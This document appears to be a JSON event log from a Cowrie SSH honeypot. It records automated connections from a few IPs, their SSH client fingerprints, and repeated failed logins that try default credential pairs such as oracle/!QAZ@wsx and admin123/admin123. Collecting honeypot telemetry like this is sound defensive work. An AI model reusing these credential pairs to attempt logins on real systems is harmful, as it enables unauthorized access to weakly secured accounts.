{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:44:27.936846Z","src_ip":"212.227.125.160","session":"b3b5d1a86857"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:44:27.937516Z","src_ip":"212.227.125.160","session":"b3b5d1a86857"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":41580,"dst_ip":"1.2.3.4","dst_port":22,"session":"1dc343079b02","protocol":"ssh","message":"New connection: 83.168.105.65:41580 (1.2.3.4:22) [session: 1dc343079b02]","sensor":"my-vps","timestamp":"2025-08-26T11:44:28.022548Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:44:28.033480Z","src_ip":"83.168.105.65","session":"1dc343079b02"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:44:28.059042Z","src_ip":"83.168.105.65","session":"1dc343079b02"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"!QAZ@wsx","message":"login attempt [oracle/!QAZ@wsx] failed","sensor":"my-vps","timestamp":"2025-08-26T11:44:28.203237Z","src_ip":"83.168.105.65","session":"1dc343079b02"}
{"eventid":"cowrie.login.failed","username":"deployer","password":"deployer","message":"login attempt [deployer/deployer] failed","sensor":"my-vps","timestamp":"2025-08-26T11:44:28.694640Z","src_ip":"212.227.125.160","session":"b3b5d1a86857"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:44:29.241074Z","src_ip":"83.168.105.65","session":"1dc343079b02"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:44:29.789531Z","src_ip":"212.227.125.160","session":"b3b5d1a86857"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59084,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7379b23ab83","protocol":"ssh","message":"New connection: 212.227.125.160:59084 (1.2.3.4:22) [session: b7379b23ab83]","sensor":"my-vps","timestamp":"2025-08-26T11:44:33.849351Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:44:33.850797Z","src_ip":"212.227.125.160","session":"b7379b23ab83"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:44:33.904993Z","src_ip":"212.227.125.160","session":"b7379b23ab83"}
{"eventid":"cowrie.login.failed","username":"www","password":"123456","message":"login attempt [www/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:44:34.153833Z","src_ip":"212.227.125.160","session":"b7379b23ab83"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:44:35.525050Z","src_ip":"212.227.125.160","session":"b7379b23ab83"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59850,"dst_ip":"1.2.3.4","dst_port":22,"session":"1723e2cbd549","protocol":"ssh","message":"New connection: 212.227.125.160:59850 (1.2.3.4:22) [session: 1723e2cbd549]","sensor":"my-vps","timestamp":"2025-08-26T11:44:40.076392Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:44:40.077772Z","src_ip":"212.227.125.160","session":"1723e2cbd549"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:44:40.127464Z","src_ip":"212.227.125.160","session":"1723e2cbd549"}
{"eventid":"cowrie.login.failed","username":"hennadii","password":"hennadii","message":"login attempt [hennadii/hennadii] failed","sensor":"my-vps","timestamp":"2025-08-26T11:44:40.337798Z","src_ip":"212.227.125.160","session":"1723e2cbd549"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:44:41.400974Z","src_ip":"212.227.125.160","session":"1723e2cbd549"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":40232,"dst_ip":"1.2.3.4","dst_port":22,"session":"deebc481d3fe","protocol":"ssh","message":"New connection: 83.168.105.65:40232 (1.2.3.4:22) [session: deebc481d3fe]","sensor":"my-vps","timestamp":"2025-08-26T11:44:43.467786Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:44:43.468752Z","src_ip":"83.168.105.65","session":"deebc481d3fe"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:44:43.507857Z","src_ip":"83.168.105.65","session":"deebc481d3fe"}
{"eventid":"cowrie.login.failed","username":"plex","password":"plex","message":"login attempt [plex/plex] failed","sensor":"my-vps","timestamp":"2025-08-26T11:44:43.627328Z","src_ip":"83.168.105.65","session":"deebc481d3fe"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:44:44.668331Z","src_ip":"83.168.105.65","session":"deebc481d3fe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60620,"dst_ip":"1.2.3.4","dst_port":22,"session":"62bfc5da8a78","protocol":"ssh","message":"New connection: 212.227.125.160:60620 (1.2.3.4:22) [session: 62bfc5da8a78]","sensor":"my-vps","timestamp":"2025-08-26T11:44:45.891405Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:44:46.113911Z","src_ip":"212.227.125.160","session":"62bfc5da8a78"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:44:46.130871Z","src_ip":"212.227.125.160","session":"62bfc5da8a78"}
{"eventid":"cowrie.login.failed","username":"admin123","password":"admin123","message":"login attempt [admin123/admin123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:44:46.421868Z","src_ip":"212.227.125.160","session":"62bfc5da8a78"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:44:47.476374Z","src_ip":"212.227.125.160","session":"62bfc5da8a78"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":37046,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef4278cacd05","protocol":"ssh","message":"New connection: 196.251.86.249:37046 (1.2.3.4:22) [session: ef4278cacd05]","sensor":"my-vps","timestamp":"2025-08-26T11:44:49.462124Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:44:50.026242Z","src_ip":"196.251.86.249","session":"ef4278cacd05"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:44:50.068329Z","src_ip":"196.251.86.249","session":"ef4278cacd05"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33156,"dst_ip":"1.2.3.4","dst_port":22,"session":"98dec3e0122b","protocol":"ssh","message":"New connection: 212.227.125.160:33156 (1.2.3.4:22) [session: 98dec3e0122b]","sensor":"my-vps","timestamp":"2025-08-26T11:44:51.830630Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:44:51.831659Z","src_ip":"212.227.125.160","session":"98dec3e0122b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:44:51.881814Z","src_ip":"212.227.125.160","session":"98dec3e0122b"}
{"eventid":"cowrie.login.failed","username":"git","password":"test","message":"login attempt [git/test] failed","sensor":"my-vps","timestamp":"2025-08-26T11:44:51.963746Z","src_ip":"196.251.86.249","session":"ef4278cacd05"}
{"eventid":"cowrie.login.failed","username":"upmpdcli","password":"upmpdcli","message":"login attempt [upmpdcli/upmpdcli] failed","sensor":"my-vps","timestamp":"2025-08-26T11:44:52.137743Z","src_ip":"212.227.125.160","session":"98dec3e0122b"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:44:53.261516Z","src_ip":"212.227.125.160","session":"98dec3e0122b"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:44:53.581274Z","src_ip":"196.251.86.249","session":"ef4278cacd05"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33926,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b884cc6d905","protocol":"ssh","message":"New connection: 212.227.125.160:33926 (1.2.3.4:22) [session: 5b884cc6d905]","sensor":"my-vps","timestamp":"2025-08-26T11:44:57.952275Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:44:57.953184Z","src_ip":"212.227.125.160","session":"5b884cc6d905"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:44:58.003210Z","src_ip":"212.227.125.160","session":"5b884cc6d905"}
{"eventid":"cowrie.login.failed","username":"es","password":"es","message":"login attempt [es/es] failed","sensor":"my-vps","timestamp":"2025-08-26T11:44:58.193859Z","src_ip":"212.227.125.160","session":"5b884cc6d905"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":59990,"dst_ip":"1.2.3.4","dst_port":22,"session":"4bc4d5685993","protocol":"ssh","message":"New connection: 83.168.105.65:59990 (1.2.3.4:22) [session: 4bc4d5685993]","sensor":"my-vps","timestamp":"2025-08-26T11:44:58.951332Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:44:58.953029Z","src_ip":"83.168.105.65","session":"4bc4d5685993"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:44:58.989782Z","src_ip":"83.168.105.65","session":"4bc4d5685993"}
{"eventid":"cowrie.login.failed","username":"steam","password":"123456","message":"login attempt [steam/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:44:59.101449Z","src_ip":"83.168.105.65","session":"4bc4d5685993"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:44:59.557484Z","src_ip":"212.227.125.160","session":"5b884cc6d905"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:45:00.140329Z","src_ip":"83.168.105.65","session":"4bc4d5685993"}
